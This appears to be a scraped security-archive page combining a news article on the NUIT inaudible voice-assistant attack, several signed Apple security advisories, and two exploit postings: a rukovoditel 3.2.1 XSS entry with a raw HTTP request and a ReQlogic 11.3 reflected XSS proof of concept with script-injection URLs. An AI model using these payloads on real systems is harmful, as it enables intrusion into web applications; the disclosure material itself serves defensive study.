A technique, dubbed the "Near-Ultrasound Inaudible Trojan" (NUIT), allows an attacker to exploit smartphones and smart speakers over the Internet, using sounds undetectable by humans.

The sensitivity of voice-controlled microphones could allow cyberattackers to issue commands to smartphones, smart speakers, and other connected devices using near-ultrasound frequencies undetectable by humans for a variety of nefarious outcomes — including taking over apps that control home Internet of Things (IoT) devices.

The technique, dubbed a Near-Ultrasound Inaudible Trojan (NUIT), exploits voice assistants like Siri, Google Assistant, or Alexa and the ability of many smart devices to be controlled by sound. According to researchers at the University of Texas at San Antonio (UTSA) and the University of Colorado at Colorado Springs (UCCS), most devices are so sensitive that they can pick up voice commands even if the sounds are not in the normal frequency range of human voices. 

In a series of videos posted online, the researchers demonstrated attacks on a variety of devices, including iOS and Android smartphones, Google Home and Amazon Echo smart speakers, and Windows Cortana. 

In one scenario, a user might be browsing a website that is playing NUIT attack commands in the background. The victim might have a mobile phone with voice control enabled in close proximity. The first command issued by the attacker might be to turn down the assistant's volume so that responses are harder to hear, and thus less likely to be noticed. After that, subsequent commands could ask the assistant to use a smart-door app to unlock the front door let's say. In less concerning scenarios, commands could cause an Amazon Alexa device to start playing music or give a weather report.

The attack works broadly, but the specifics vary per device.

"This is not only a software issue or malware," said Guenevere Chen, an associate professor in the UTSA Department of Electrical and Computer Engineering, in a statement. "It's a hardware attack that uses the internet. The vulnerability is the nonlinearity of the microphone design, which the manufacturer would need to address."

    

Using inaudible sounds played through a speaker, an attacker can issue commands to smart devices. Source: UTSA and UCCS

Attacks using a variety of audible and non-audible frequencies have a long history in the hacking world. In 2005, for example, a group of researchers at the University of California, Berkeley, found that they could recover nearly all of the English characters typed during a 10-minute sound recording, and that 80% of 10-character passwords could be recovered within the first 75 guesses. In 2019, researchers from Southern Methodist University used smartphone microphones to record audio of a user typing in a noisy room, recovering 42% of keystrokes.

The latest research appears to use the same techniques as a 2017 paper from researchers at Zhejiang University, which used ultrasonic signals to attack popular voice-activated smart speakers and devices. In the attack, dubbed the DolphinAttack, researchers modulated voice commands on an ultrasonic carrier signal, making them inaudible. Unlike the current attack, however, the DolphinAttack used a bespoke hardwired system to generate the sounds rather than using connected devices with speakers to issue commands.

**Defenses Against NUIT Cyberattacks**

The latest attack allows any device compatible with audio commands to be used as a conduit for malicious activity. Android phones could be attacked through inaudible signals playing in a YouTube video on a smart TV, for instance. iPhones could be attacked through music playing from a smart speaker and vice versa.

In most cases, the inaudible "voice" does not even need to have to be recognizable as the authorized user, said UTSA's Chen in a recent statement announcing the research.

"Out of the 17 smart devices we tested, \[attackers targeting\] Apple Siri devices need to steal the user's voice, while other voice assistant devices can get activated by using any voice or a robot voice," she said. "It can even happen in Zoom during meetings. If someone unmutes themselves, they can embed the attack signal to hack your phone that's placed next to your computer during the meeting."

However, the receiving speaker has to be turned up fairly loud for an attack to work, while the length of the malicious commands has to be less than 0.77 seconds, which can help mitigate drive-by attacks. And devices that are hooked into earbuds and headsets are less likely to be vulnerable to being used by an attacker, according to Chen.

"If you don't use the speaker to broadcast sound, you're less likely to get attacked by NUIT," she said. "Using earphones sets a limitation where the sound from earphones is too low to transmit to the microphone. If the microphone cannot receive the inaudible malicious command, the underlying voice assistant can't be maliciously activated by NUIT."

The technique is demonstrated in dozens of videos posted online by the researchers, who did not respond to a request for comment before publication.

Hey, Siri: Hackers Can Control Smart Devices Using Inaudible Sounds

Apple Security Advisory 2023-03-27-9 - Studio Display Firmware Update 16.4 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-03-27-9 Studio Display Firmware Update 16.4Studio Display Firmware Update 16.4 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213672.DisplayAvailable for: macOS Ventura 13.3 and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2023-27965: Proteas of Pangu LabFor more information about Studio Display Firmware updates,please visit https://support.apple.com/HT213110.All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiIZwACgkQ4RjMIDkeNxm/gg//WKOK5VTFA9xuq5Mg5TsMin22eCVxfJgh7Lafn/bOpi1zq5BI+j9t8itbKkTu5V/iiiZG2jV6Sr2e3CC8WSilgjexoREoMpRkED74DgGr4HoWYA9EVxrdCMoT2OF3ehSUKKWAOAKxB54C5STGXEDHoI6sx7wuMdDCJUnqDMOoVWlJnKaV6/AtAm8Ji731JzRLlaRdGSoMltfwfK+f8co1PWwZ2wK+ktNfJQYaQAc0dmED1/y28EOcxk3c//qxiE/fkBr4BH5LOjf5VQ2B2rOoLWjiQTILbJwfYZLhBnCK6pUJgFk3490mbq4J6sNoiAhzI6A4F8hFmfdOhYPzTWNqKuK5al/SoxyDrNqImrjZkrgCY/0aUPpm5BZyZge6KrS5Gkgezcwt5bI8BMuGSekZGmm32zO0lWOnVYpO8oWOkLTN5zcToMi+eorth11UQGQtO0u+lSCxwmx6IAuStxGlMka7Jo+tTymMp4x85xkZ/y5d67TJVg41/tOdsp66adZTY0vDzeVsXjFxKnLqc7QSdmWa7t5OkQyhBAj7SvJPNaHq5AT+O5GBYzgcAklpeBbinVwepmGLBslXhgrRp6cPu1w7GsCZVR7mmFzwBASfWn9OtjXPeEiOONAdIx3/e6ZqU/n/K5JwmcA4r3RgzkZELzApKKhphicB/u+vlaVnmg4==M4UX-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-9

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

Apple Security Advisory 2023-03-27-8 - Safari 16.4 addresses bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-8 Safari 16.4

Safari 16.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213671.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit Web Inspector  
We would like to acknowledge Dohyun Lee (@l33d0hyun) and crixer  
(@pwning_me) of SSD Labs for their assistance.

Safari 16.4 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn4ACgkQ4RjMIDke  
NxnzuA//R6r9YrqrgdWro+Why6ihvWKdVIBgEVu93nNfgd34+HLkRKsr00xH0hNw  
kDvjtfPpCeuQB61VtVO6dCEPHLJICqEyOeqHoIDYvKwAoH830u3S4vWA6ozJpBmd  
CCI+5tF9qAZWb+O0ED+hyU31z/+0s+gTGUjp7dhAnKJ6jKQOjSwWG4+YEgJA6wGG  
oOC8dXGTWMHQJsDyxliGC/FQVo6cyWtbZiwWB9QYKP48yIldrRWJz75xOUWYOjWe  
GYZ+vNDaOIi+/YHRHRYf/RY7Fdigur5rsWtzK/0v1T/n3t2kwe6WZkF4HdKFHRXL  
KSw1fogSQh1BncUXlVfkn3BMPoEOUxHkhtawdKkewK+W8ZTC2mq+YwrJ26YZMTmU  
5Nvgua4gxm2gb8LupcaXxt+o/nIbbTWyNx6rEyskWMxw6jZksBwgdDk2pSrUtmWh  
d2VnkbUjoLXbP7uqSrf2gqd6drAVrHUlmEHLVAXCG60mhWNzCxr2M+DG2RZ0RLgJ  
DMy2O4zxdzWZxkRJE86LchYz8zToQD7eQXm3zMQTGdSZoJXr3NxVGwdCaCGdhGAA  
ckJV7nHybrVGQXdo5EeNuxKeiyJMimGGIDpQmHrrf+PgeL7zKi9e4KwyyobAmvZn  
lw86QALA/97AKbSQthqHlDnv+inUrdwH1TWcurtCkjeRHgkhif8=  
=o24C  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-8

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Apple Security Advisory 2023-03-27-7 - watchOS 9.4 addresses bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-7 watchOS 9.4

watchOS 9.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213678.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Calendar  
Available for: Apple Watch Series 4 and later  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

CoreCapture  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-28181: Tingting Yin of Tsinghua University

Find My  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

FontParser  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27956: Ye Zhang of Baidu Security

Foundation  
Available for: Apple Watch Series 4 and later  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz  
Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-27969: Adam Doupé of ASU SEFCOM

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Podcasts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies and  
Wenchao Li and Xiaolong Bai of Alibaba Group

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2023-27931: Mickey Jin (@patch1t)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

ImageIO  
We would like to acknowledge Meysam Firouzi @R00tkitSMM for their  
assistance.

Mail  
We would like to acknowledge Chen Zhang, Fabian Ising of FH Münster  
University of Applied Sciences, Damian Poddebniak of FH Münster  
University of Applied Sciences, Tobias Kappert of Münster University  
of Applied Sciences, Christoph Saatjohann of Münster University of  
Applied Sciences, Sebast, and Merlin Chlosta of CISPA Helmholtz  
Center for Information Security for their assistance.

Safari Downloads  
We would like to acknowledge Andrew Gonzalez for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn4ACgkQ4RjMIDke  
NxlR6A/+IfL/Ox8qSL2VCsB8vlkddkF4dX5NK6hHzLqZIBq0LmLS8/iEK21+MKP3  
F3OwkeM/dgPJwTrXyLiMqDrn/Qh9HPUD1j2iNbPIYCZRBd7O4iHgbwhlT7UAZyMu  
JzAMFRokr4tRDJJvDjXHL5dPtk/YliTZSynjeJNqEGG5+rNUW6jjPoqEp5w+aPYG  
HwsxZCvySyaOxdB9mWIKJMPUf+uz/HtAn60CA59UeIxliHbco5yZZdqVwTjEwcz4  
EJockj5dnK7dDa6yIHnGGlv8Owx2wvtUU3bRMSQ712Zqek+qYxS7Bcp3ywwf5OQM  
mIIdLFDaDktNFXMMxsB9IgTuyAziUnjWuJ18NaYPy1lJRBZW/SHblPUoGObRrfoe  
JFa33R8lsW9G9ItvLGdXVB73FyfeKnFI1WkeBTPNk4bhkAbTYzPK7IOdHQ6GYSPi  
DpVJvZqiD6tgIpngqrMjkOVXoM9OhJVct3G81CrqZdSkUrVeBqHrmw7D8FE08xkF  
eqZAnuEDF/muUP49n2RiaIAfw9wFX8wVYbWEziC+DZU5QHqpogHPzn3RJF2yZ3cl  
jhLaY3BEibgE/ISyzQ08JysDWeGHwpyRwhr6FVTlEOuHqMCWfGQ/+WSKF0GigXMD  
itrkUpyaSJdLn+oc2N3hmDGdyPKwWMmRP9Qa4/nAFaPV+CJedbA=  
=KG/z  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-7

Apple Security Advisory 2023-03-27-6 - tvOS 16.4 addresses bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-6 tvOS 16.4

tvOS 16.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213674.

AppleMobileFileIntegrity  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Core Bluetooth  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted Bluetooth packet may result  
in disclosure of process memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability  
Research Institute

CoreCapture  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-28181: Tingting Yin of Tsinghua University

FontParser  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27956: Ye Zhang of Baidu Security

Foundation  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

ImageIO  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz  
Innovation Lab and  jzhu working with Trend Micro Zero Day Initiative

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-27969: Adam Doupé of ASU SEFCOM

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Podcasts  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

TCC  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2023-27931: Mickey Jin (@patch1t)

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

ImageIO  
We would like to acknowledge Meysam Firouzi @R00tkitSMM for their  
assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn0ACgkQ4RjMIDke  
Nxlyyg//ePQb9FK6kVxRCnemA/ohDVERRj4NgAV7wlwaD5S/JiB2J1udvO6PJtMK  
WR70cDcxOyEWwS45ejP/QhkzpEMRQr0Xhgr9E/BRFm8cltHmPbrVLqBXkIYYDYOT  
GfLTgzEPHkHnByJySHr8DfNHxDib7oABRaNWHN5Jlr9c7+acpZokOPk7EXcnwojd  
yZjxkbiSkOmfizS+hIQvrSXQl+squ1Lva8v4KyygWqnCqbnq+9SVKVAFchWTnXqD  
LvODlXEb5a8TwCapcWLQKtrn3oK84tzI9iIDVrY0qhg5Y3Igu0ZrKF6pIcAk2jiA  
MFS6rrgRzOk3nEGCYAIhVY8pt989oE5euC9OK/pT1gOUBzXPAiN3/MmvRqRNkNmJ  
waNaVw/ITLVWbAN7HlwOZCft1qv+jCdtI7w5U/GwTXWR/ZcFeTFq93RNRw3pbhqZ  
dXhJAEbqAxFIgkobmAX7jTnXThs8WJUPIhs3aPFLRrpmVpR+s3XanvGxyXK4gj6/  
9ziqm2HQCCYxz654R65Dh97bRhZRD5vtf9ygtuAbQwQnP61df4MDN3hsQAUyhriT  
vu0TYdd7yg1oG3mqJxybx9eMQOLB8PBGAR3/pXcD+gLiLATRyH6i4QP43uoQCExE  
1hCVqZBIMG/vq8M0XEKT+85/RdaLBdlDKES3N4QLq4UztsWT4bY=  
=P2oh  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-6

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

